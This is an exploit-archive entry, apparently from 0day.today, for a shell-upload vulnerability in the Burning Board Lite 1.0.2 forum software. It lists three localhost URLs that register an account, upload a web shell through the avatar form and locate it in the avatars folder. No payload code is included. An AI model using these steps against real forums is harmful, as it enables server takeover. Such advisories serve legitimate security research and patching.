id: 12109
date: 05/02/2010
title: Burning Board Lite 1.0.2 Shell Upload Vulnerability
author: indoushka
cves: 

===================================================
Burning Board Lite 1.0.2 Shell Upload Vulnerability
===================================================

========================================================================================                 
| # Title    : Burning Board Lite 1.0.2 Upload Shell Vulnerability           
| # Author   : indoushka                                                              
| # email    : indoushka@hotmail.com                                                  
| # Home     : www.iqs3cur1ty.com                                                                                                                                                                                                              
| # Script   : Powered by Burning Board Lite 1.0.2   
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)      
| # Bug      : Upload Shell                                                             
======================      Exploit By indoushka       =================================
 # Exploit  :
  
 1- http://127.0.0.1/wbblite/register.php (2 register)
  
 2- http://127.0.0.1/wbblite/usercp.php?action=avatars&sid=&page=1 (2 Upload)
  
 3- http://127.0.0.1/wbblite/images/avatars/ (2 F!nd it )



#  0day.today [2023-03-27]  #